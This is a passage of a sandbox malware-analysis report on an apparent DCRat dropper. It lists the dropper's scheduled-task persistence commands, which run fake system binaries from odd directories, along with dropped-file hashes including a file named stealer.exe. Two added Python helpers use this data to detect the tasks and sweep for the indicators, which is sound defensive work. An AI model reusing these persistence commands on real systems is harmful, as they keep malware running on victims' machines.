                                                              schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4224
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4220
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3104
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1616
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2800
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4464
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2748
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4988
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3116
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1980
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4852
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1440
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1144
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2068
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3156
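Every dropped binary in the tree above gets the same three-task treatment: one ONLOGON task with /rl HIGHEST and two MINUTE tasks that re-launch it every few minutes, so killing the process only buys time until the next trigger. The binaries borrow system names (csrss.exe, conhost.exe, smss.exe, dwm.exe, winlogon.exe and so on) but live in directories where no genuine copy belongs. The following Python helper is an added example, not part of the sandbox report or the DCRat tooling: it parses schtasks /create lines like the ones above, groups them by the program they launch, and flags each binary that is a system name outside its expected directory, that runs at highest privilege, or that has the logon-plus-watchdog pairing. The sample lines are copied from this report except for the svchost.exe control line, which is constructed to show the negative case; the expected-location table is an assumption for a stock Windows install.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: schtasks command lines copied from the process tree
# above, plus one benign-looking control line (the svchost.exe task) that is an
# assumption added here to exercise the negative case.
SAMPLE_REPORT = r"""
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /f
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /f
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /rl HIGHEST /f
schtasks.exe /create /tn "Updater" /sc DAILY /tr "'C:\Windows\System32\svchost.exe'" /f
"""
SAMPLE_LINES = [ln for ln in SAMPLE_REPORT.splitlines() if ln.strip()]

# Assumed table: where the genuine copies of the reused binary names live on a
# stock install. The same file name under any other directory is a masquerade.
EXPECTED_DIRS = {
    name: (r"c:\windows\system32", r"c:\windows\syswow64")
    for name in (
        "csrss.exe", "conhost.exe", "smss.exe", "wininit.exe", "winlogon.exe",
        "dwm.exe", "spoolsv.exe", "dllhost.exe", "runtimebroker.exe",
        "backgroundtaskhost.exe", "sppextcomobj.exe", "svchost.exe",
    )
}
EXPECTED_DIRS["officeclicktorun.exe"] = (
    r"c:\program files\common files\microsoft shared\clicktorun",
    r"c:\program files (x86)\common files\microsoft shared\clicktorun",
)

# /tn name, /sc schedule, optional /mo modifier, /tr "'path'" as written by this dropper.
SCHTASKS_RE = re.compile(
    r'/tn\s+"(?P<name>[^"]+)".*?'
    r'/sc\s+(?P<sched>\w+)'
    r'(?:\s+/mo\s+(?P<mod>\d+))?.*?'
    r'/tr\s+"\'?(?P<path>[^\'"]+)\'?"',
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Task:
    name: str
    schedule: str            # MINUTE, ONLOGON, DAILY, ...
    interval: Optional[int]  # /mo value for MINUTE schedules
    path: str                # program the task launches
    highest: bool            # /rl HIGHEST present


@dataclass
class Finding:
    path: str
    tasks: list = field(default_factory=list)
    reasons: set = field(default_factory=set)


def parse_schtasks(line: str) -> Optional[Task]:
    """Pull the fields that matter for triage out of one schtasks /create line."""
    if "/create" not in line.lower():
        return None
    m = SCHTASKS_RE.search(line)
    if not m:
        return None
    return Task(
        name=m["name"],
        schedule=m["sched"].upper(),
        interval=int(m["mod"]) if m["mod"] else None,
        path=m["path"],
        highest=re.search(r"/rl\s+HIGHEST", line, re.IGNORECASE) is not None,
    )


def masquerade_reason(path: str) -> Optional[str]:
    """Why a path is suspicious, or None if the name is unknown or in its place."""
    p = path.lower()
    base = p.rsplit("\\", 1)[-1]
    allowed = EXPECTED_DIRS.get(base)
    if allowed is None or any(p.startswith(d + "\\") for d in allowed):
        return None
    return f"{base} outside its expected directory"


def triage(lines) -> dict:
    """Group task creations by launched binary and attach indicators to each."""
    findings: dict = {}
    for line in lines:
        t = parse_schtasks(line)
        if t is None:
            continue
        f = findings.setdefault(t.path, Finding(path=t.path))
        f.tasks.append(t)
        why = masquerade_reason(t.path)
        if why:
            f.reasons.add(why)
        if t.highest:
            f.reasons.add("runs with /rl HIGHEST")
    for f in findings.values():
        scheds = {t.schedule for t in f.tasks}
        # The pairing seen in this report: a logon task plus minute-interval
        # watchdogs for the same binary, so a kill only lasts until the next trigger.
        if "ONLOGON" in scheds and "MINUTE" in scheds:
            f.reasons.add("logon task plus minute-interval watchdog for the same binary")
    return findings


def flagged_paths(lines) -> list:
    """Paths that triggered at least one indicator, sorted for stable output."""
    return sorted(p for p, f in triage(lines).items() if f.reasons)


if __name__ == "__main__":
    for path, f in triage(SAMPLE_LINES).items():
        names = ", ".join(t.name for t in f.tasks)
        print(f"{path}\n  tasks: {names}\n  reasons: {sorted(f.reasons) or 'none'}")
```

On a live host the same checks apply to the output of `schtasks /query /fo CSV /v` or to Security event 4698 (task created) and Sysmon event 1 for schtasks.exe: a task action whose file name is a System32 binary but whose directory is not System32 or SysWOW64 is worth a look regardless of the task name.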

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Downloads

                                                            • C:\MsWinsessiondllNet\driverBrokercommon.exe

                                                              Filesize

                                                              2.3MB

                                                              MD5

                                                              d84e590c3715c79dc5b92c435957d162

                                                              SHA1

                                                              2901580903e4b356448d9fe7bea510261e655363

                                                              SHA256

                                                              d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba

                                                              SHA512

                                                              b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485

                                                            • C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

                                                              Filesize

                                                              158B

                                                              MD5

                                                              ea70d7b0f1a8a1ff2d246efbdcfe1001

                                                              SHA1

                                                              252e762aee8fcc5761e17bb84aa3af8276852f5c

                                                              SHA256

                                                              1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31

                                                              SHA512

                                                              1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86

                                                            • C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

                                                              Filesize

                                                              218B

                                                              MD5

                                                              7c9bb5fda146efee5ee4a243d6e404b0

                                                              SHA1

                                                              c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd

                                                              SHA256

                                                              1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b

                                                              SHA512

                                                              797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OfficeClickToRun.exe.log

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              5cb90c90e96a3b36461ed44d339d02e5

                                                              SHA1

                                                              5508281a22cca7757bc4fbdb0a8e885c9f596a04

                                                              SHA256

                                                              34c15d8e79fef4bddec7e34f3426df3b68f8fc6deac29ea12d110f6c529fe3bb

                                                              SHA512

                                                              63735938c841c28824e3482559df18839930acc5ea8600b1074439b70a2f600a92f41593568e49991f25f079e7f7361b4f1678feadbf004f6e9e4d51d36598d4

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              d85ba6ff808d9e5444a4b369f5bc2730

                                                              SHA1

                                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                                              SHA256

                                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                              SHA512

                                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              944B

                                                              MD5

                                                              77d622bb1a5b250869a3238b9bc1402b

                                                              SHA1

                                                              d47f4003c2554b9dfc4c16f22460b331886b191b

                                                              SHA256

                                                              f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                              SHA512

                                                              d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              948B

                                                              MD5

                                                              1a58f982c18490e622e00d4eb75ace5a

                                                              SHA1

                                                              60c30527b74659ecf09089a5a7c02a1df9a71b65

                                                              SHA256

                                                              4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d

                                                              SHA512

                                                              ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              276798eeb29a49dc6e199768bc9c2e71

                                                              SHA1

                                                              5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                              SHA256

                                                              cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                                              SHA512

                                                              0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              ec79fae4e7c09310ebf4f2d85a33a638

                                                              SHA1

                                                              f2bdd995b12e65e7ed437d228f22223b59e76efb

                                                              SHA256

                                                              e9c4723a5fe34e081c3d2f548a1d472394cc7aa58056fcf44ca542061381243a

                                                              SHA512

                                                              af9dda12f6bb388d826fe03a4a8beed9bda23a978aa55a2af6a43271660ee896a7ee3bcf2c4d2f1e6180902791d8c23560f1c2ec097a501d8c6f4f6c49075625

                                                            • C:\Users\Admin\AppData\Local\Temp\201d0dd0-dd34-4a80-b983-499984a1af49.vbs

                                                              Filesize

                                                              491B

                                                              MD5

                                                              e10487abf474865152575b2cd81910c0

                                                              SHA1

                                                              4f1c99557da2d0685d6f86e42f5e5bf76c8f5921

                                                              SHA256

                                                              6bd19066ea6ce1863ff93bf9aead7a58ea2332660def11379be9c55d1a03a3bd

                                                              SHA512

                                                              dc19bda7aeb827158be95c2d2ac9820ece72ad66139847142a155ddab2faf874edb06e60b3f6c2483847edd4af539585de0871d483e2dad3bf3461bd8fc1679b

                                                            • C:\Users\Admin\AppData\Local\Temp\2e3b6573-9956-4c08-a354-650a54e4b5fc.vbs

                                                              Filesize

                                                              715B

                                                              MD5

                                                              133b0b141005878ef497aab0ed89d9e4

                                                              SHA1

                                                              c8313f29635593e1c11a68d89b97fb1f0a5c446b

                                                              SHA256

                                                              9351880bda96633971197caa9ec767802845d26e3dc5da268ab69299262519b3

                                                              SHA512

                                                              5a6868e827989cd48db3a2c9545baa3c1f1fd4fd2023529d69f08a13b0facf0c4c7b6e6621ed6be89909fa9a7473be5786e2c1e7caf3f7d656c6445821892963

                                                            • C:\Users\Admin\AppData\Local\Temp\4756ef43-838f-41ac-b2a9-a1e264a9db1d.vbs

                                                              Filesize

                                                              715B

                                                              MD5

                                                              0e92844c30f1e233ad4b8044fa3cd673

                                                              SHA1

                                                              080ea409adc4d3744ed5c4712f36ef88a94a375a

                                                              SHA256

                                                              2d3ff981e4fe3853973230b37292eee9290362d7a07d9fa0f317c2ffcea3961c

                                                              SHA512

                                                              a95efc157bfd7ea44965438eb6f2b021434ad052a8dfbab38be476d15fab008cea2efd914f1bfb489e1f1aa8541e2f5164905c0aca998285cce260f0387bb9d4

                                                            • C:\Users\Admin\AppData\Local\Temp\4ae9b577-2587-4e84-a33a-fd9cc54e5ee6.vbs

                                                              Filesize

                                                              715B

                                                              MD5

                                                              d549be64163140865839441e3ef85f15

                                                              SHA1

                                                              0c0de615fd32af9055dd383956ea9977be025d59

                                                              SHA256

                                                              e1334fe8bedb10b2cef710c633d2069c0d53330fc750ac0a863cf7b82cd9cc4e

                                                              SHA512

                                                              ba7f134bb8adfc57791454fe20df24df94fe9280d0e27e8047d636f2a3ca76d7978417f7e652f98c3ba4c60ce7542a4d5954b9762fdefa501aad2648ed645851

                                                            • C:\Users\Admin\AppData\Local\Temp\4bcc22c2-bfc5-4da7-b57a-f1d64750d21c.vbs

                                                              Filesize

                                                              715B

                                                              MD5

                                                              5e753b39185bd2b6718b3ba7b82aa474

                                                              SHA1

                                                              a2a90bde15a46f2c451c51e9b2ba9de4faeb8144

                                                              SHA256

                                                              c769601789b806bf9c264920524f6b7ed27dd1d6eb01bf0020df10e9571c2748

                                                              SHA512

                                                              1c9b1147baeeae61b42ea6dd72590e78ae23d1e80e96f1df35fe51c24c2d21278bc8d0ec7e204c84a39776e13eaa2e22f66f787f45ec66d3323e51f2e9d6c9d5

                                                            • C:\Users\Admin\AppData\Local\Temp\58cd3153-e99f-4382-8f9d-20b7b99c045d.vbs

                                                              Filesize

                                                              715B

                                                              MD5

                                                              fee8ac1bc4a472ec1285bf070266d40d

                                                              SHA1

                                                              f12a85efe00a4a40a4d5a0b88df142c9e9387d35

                                                              SHA256

                                                              49231d4f5941440bb49df789d982dd3fc87f4fa8397a4cd8183285f0a27e67eb

                                                              SHA512

                                                              4f37e77031939a900408a3ea4f25b975c5e67e3ca71ab825b764a497c263fffca5fb0284365a163476ba245d08ca7a1b8278a04f1a62bfadfea2d50da69dbfc3

                                                            • C:\Users\Admin\AppData\Local\Temp\77723675-b9f0-49d6-86aa-6fd4188fef6f.vbs

                                                              Filesize

                                                              714B

                                                              MD5

                                                              1ee3ad79e53f9daf6cb84a9fbe7b14ec

                                                              SHA1

                                                              8315aea769144989b55d61d7bfc8267eefd5f47f

                                                              SHA256

                                                              7587b5c9b7e1476869d96641a5f5d5364938d202cd2c364a58cfce5a3a5a4bfb

                                                              SHA512

                                                              4d7177fb926f140461f0fe6858cdd8b0c0936d957c67961df53e6cd0b13753b6a7e7e2865589172a17ffced01b362be4e225fdabb2e1acceaa3c3d92fb275eac

                                                            • C:\Users\Admin\AppData\Local\Temp\79d8d831-89f9-4762-b1a4-f88f984104fa.vbs

                                                              Filesize

                                                              715B

                                                              MD5

                                                              fba285925e3d4a6934e8855c5a7f607b

                                                              SHA1

                                                              264d77d7cfe521b3ddb6320df5d9b7ac698cf82d

                                                              SHA256

                                                              0d0075c3672b522ada6ed8816b6c95fd462a9f8cd40bf46967bee68dd19b9acd

                                                              SHA512

                                                              408d57c114d490bc3a2f1f359af3a2b91a58f5da606157b7802b792c154b42d93c02a3e325ed105843b2034142ecb60fe0b2bc6a43d3d8b96028e0fac7e8edf2

                                                            • C:\Users\Admin\AppData\Local\Temp\8b2c54eb-e0e1-4cf2-a59e-22e14481f541.vbs

                                                              Filesize

                                                              715B

                                                              MD5

                                                              d86460fade326da57ff0e0a6ce851553

                                                              SHA1

                                                              d312d12d6e864dfc628370fb35a637a4360082c3

                                                              SHA256

                                                              35a91c57dd4a033599b4940d426a43d0a91d2c5a1c21d89dd2a287b8face2db4

                                                              SHA512

                                                              bc59142fe7ee449925972e9a77ec93490d520af8d02e648f81fe3af8aa7755709e617d1bc83df67400ef3ac115436160a66a38f6b0087d3fbdcfb955049ea004

                                                            • C:\Users\Admin\AppData\Local\Temp\Inject.exe

                                                              Filesize

                                                              75KB

                                                              MD5

                                                              d428ddd1b0ce85a6c96765aeaf246320

                                                              SHA1

                                                              d100efdaab5b2ad851fe75a28d0aa95deb920926

                                                              SHA256

                                                              453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb

                                                              SHA512

                                                              3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899

                                                            • C:\Users\Admin\AppData\Local\Temp\SXVJApfGP5.bat

                                                              Filesize

                                                              204B

                                                              MD5

                                                              9bb7d27e4566ce09ef791f86b09732fe

                                                              SHA1

                                                              9b7e5becf0e6dcf48a2ed150aaad53333bbfb48c

                                                              SHA256

                                                              ba97fedd893a3a6de6acfd327b5463342a494f539165238e835043fecf6d97d8

                                                              SHA512

                                                              f30137d111300079993005ef3232b888515181ed700ac13c66e980f01b1cb98536446027c10d4a6a3c6962a09846b0d1931c97f28b92ddc6c44260e4830fbb9d

                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c5s40mlo.qt2.ps1

                                                              Filesize

                                                              60B

                                                              MD5

                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                              SHA1

                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                              SHA256

                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                              SHA512

                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                            • C:\Users\Admin\AppData\Local\Temp\a20377c5-42e8-47d2-8941-150cbd2a1243.vbs

                                                              Filesize

                                                              714B

                                                              MD5

                                                              94ae98a099f9e20d7e8514bf87603751

                                                              SHA1

                                                              dfac2e0cf4d915abdac2f149b7be3172d15ddff8

                                                              SHA256

                                                              8dd75515a9b4690a3eb907418696de48c2c42750cf530fa78f99d6151dfec7ca

                                                              SHA512

                                                              7a8c4debeef65e95f3264204e04d976e34ffdf9ef7c530c2583e16dfa04ebc1d045be923111e9402a5ab7d833ed54040ccdcd07a768da7794ef963e09b58d32e

                                                            • C:\Users\Admin\AppData\Local\Temp\d5a02c96-5b4d-4eac-be2a-3b9ea31321b6.vbs

                                                              Filesize

                                                              715B

                                                              MD5

                                                              670ca1952cf4cc3076532b671c86b6c0

                                                              SHA1

                                                              bcb4298927bf213a1e7d3496da7c1fc719541e14

                                                              SHA256

                                                              8fc1809d6c04c9922db24d125c43d67f939f44b202051dd72103c87afd252a03

                                                              SHA512

                                                              24331c612d4aafcf61074b77078cdb9e67ffbd0c4614d4965b6678ed97957d16d14f563404f3e6ab102e23dc6208eff5a798008d8858019246e567789759c806

                                                            • C:\Users\Admin\AppData\Local\Temp\e2c9836d-1c54-40a4-b2a2-595e2a692efd.vbs

                                                              Filesize

                                                              715B

                                                              MD5

                                                              6ad35a059bcbda82c5bd886d3717fd49

                                                              SHA1

                                                              d8475f059324e5a52e3ea2af8ed9513b22a32e6c

                                                              SHA256

                                                              03f1d446995f790aa4a55848c1161d28eb9526e6330c72d2058acc059a56137d

                                                              SHA512

                                                              751a09d4db1c6603cdecb025872f89d9697cd3dc541eb839926ebdcc7ebdbd37eadbb06e56aace9df6898538d67b2b0a47ee7d0a56c916aaa30ee485c2d918fb

                                                            • C:\Users\Admin\AppData\Local\Temp\e7837ef9-14b2-4386-9ccd-3c775511e365.vbs

                                                              Filesize

                                                              715B

                                                              MD5

                                                              4f32bce711ca904bb6878ce4bef41d41

                                                              SHA1

                                                              a3b6c98a5fa59212895dc2a77318b39b4a7e3f3c

                                                              SHA256

                                                              5dac33fef0ff4414fe21e048fce3ddf901526237fb168db55723c975bbc52d1e

                                                              SHA512

                                                              4e42efc2ead154c196aa2a5da95c992fe433de998f518b29d51aef64ab95be6256de2dea5ced7ef84e73ff87aae1b2a4caa07ab2af8dabe23dc2efe395b3c1df

                                                            • C:\Users\Admin\AppData\Local\Temp\stealer.exe

                                                              Filesize

                                                              229KB

                                                              MD5

                                                              8cc1e7cf94fec9bc505ce7411aa28861

                                                              SHA1

                                                              08703de84f3db427c368f16c873664d78bd83264

                                                              SHA256

                                                              cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba

                                                              SHA512

                                                              fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423

                                                            • C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

                                                              Filesize

                                                              2.6MB

                                                              MD5

                                                              6216b6bef94c09a40bfa263809b1ae56

                                                              SHA1

                                                              a928120e65199c6aaae6c991aa0466f3f8b06020

                                                              SHA256

                                                              eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b

                                                              SHA512

                                                              0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215
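
The Downloads list above is the set of file IOCs this run produced. The sweep below is an added example written for this page (not part of the sandbox report): it hashes every file under a root with MD5, SHA1 and SHA256 in one pass, matches any digest against an IOC map, and additionally flags files that sit inside the `MsWinsessiondllNet` drop directory or carry one of the dropped-file names outside `C:\Windows` (the legitimate `dllhost.exe` lives in `System32`, so the name alone is not a hit). The four SHA256 values are copied from the list above; `SUSPICIOUS_NAMES` is assembled from the process tree and the Downloads list, and `demo()` builds a constructed directory with made-up bytes, not the real dropper, so the block runs offline.

```python
"""Sweep a directory tree for the dropped files listed under Downloads.
Added example for this report; demo() uses constructed data only."""
import hashlib
import tempfile
from pathlib import Path

# SHA256 values copied from the Downloads list (a subset), keyed by digest.
PAGE_SHA256 = {
    "d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba": "driverBrokercommon.exe",
    "453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb": "Inject.exe",
    "cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba": "stealer.exe",
    "eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b": "чекер dc.exe",
}
# Names and drop directory taken from the process tree and Downloads list.
SUSPICIOUS_NAMES = {"dllhost.exe", "driverbrokercommon.exe", "inject.exe", "stealer.exe"}
DROP_DIR = "mswinsessiondllnet"


def hash_file(path, chunk: int = 1 << 20) -> dict:
    """Return {'md5':..,'sha1':..,'sha256':..} reading the file once."""
    digests = {algo: hashlib.new(algo) for algo in ("md5", "sha1", "sha256")}
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            for d in digests.values():
                d.update(block)
    return {algo: d.hexdigest() for algo, d in digests.items()}


def sweep(root, iocs: dict) -> list:
    """Walk root; return one hit dict per file with at least one reason."""
    hits = []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        reasons = []
        digests = hash_file(p)
        # MD5/SHA1/SHA256 hex lengths differ, so one map can hold all three.
        for algo, hexdigest in digests.items():
            label = iocs.get(hexdigest)
            if label:
                reasons.append(f"{algo} matches {label}")
        parts = [part.lower() for part in p.parts]
        if DROP_DIR in parts:
            reasons.append("inside drop directory")
        if p.name.lower() in SUSPICIOUS_NAMES and "windows" not in parts:
            reasons.append("dropped-file name outside C:\\Windows")
        if reasons:
            hits.append({"path": str(p), "size": p.stat().st_size,
                         "sha256": digests["sha256"], "reasons": reasons})
    return hits


def demo() -> list:
    """Constructed directory: one fake drop in MsWinsessiondllNet, one benign file."""
    root = tempfile.mkdtemp()
    drop = Path(root, "MsWinsessiondllNet")
    drop.mkdir()
    payload = b"MZ constructed sample bytes, not the real dropper\n"  # constructed
    (drop / "dllhost.exe").write_bytes(payload)
    Path(root, "readme.txt").write_text("benign control file")
    # Register the constructed payload's own digest so the hash path is exercised.
    iocs = dict(PAGE_SHA256)
    iocs[hashlib.sha256(payload).hexdigest()] = "constructed dllhost.exe"
    return sweep(root, iocs)


if __name__ == "__main__":
    for hit in demo():
        print(hit["path"], hit["size"], hit["sha256"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

On a live host, point `sweep()` at `C:\` (or at `C:\Users` and the drive root, since the drop directory is created at the root of `C:`) and treat a digest match as confirmed; the name and directory rules are there to catch a recompiled build whose hashes have moved.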

                                                            • memory/2088-163-0x000002431EB00000-0x000002431EB76000-memory.dmp

                                                              Filesize

                                                              472KB

                                                            • memory/2088-225-0x00007FFBA56C0000-0x00007FFBA6181000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/2088-62-0x00007FFBA56C3000-0x00007FFBA56C5000-memory.dmp

                                                              Filesize

                                                              8KB

                                                            • memory/2088-86-0x00000243043D0000-0x0000024304410000-memory.dmp

                                                              Filesize

                                                              256KB

                                                            • memory/2088-126-0x00007FFBA56C0000-0x00007FFBA6181000-memory.dmp

                                                              Filesize

                                                              10.8MB

• memory/2088-164-0x000002431EB80000-0x000002431EBD0000-memory.dmp (Filesize: 320KB)
